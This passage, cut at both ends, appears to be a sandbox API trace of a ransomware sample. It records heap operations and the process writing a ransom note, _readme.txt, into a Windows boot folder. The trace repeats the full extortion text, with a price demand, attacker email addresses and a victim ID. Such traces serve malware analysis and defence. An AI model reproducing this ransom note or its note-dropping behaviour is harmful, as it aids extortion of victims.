(in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.141] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0056.141] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.141] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.141] PathFindFileNameW (pszPath="") returned="" [0056.141] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.142] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.142] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.142] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.142] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0056.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.142] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0056.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.142] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.142] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.142] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x326aa18 [0056.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326aa18, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0056.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.143] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.143] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.144] CloseHandle (hObject=0x5c8) returned 1 [0056.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.144] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.144] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.144] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.145] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaad5d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.145] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaad5d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.145] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.145] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, 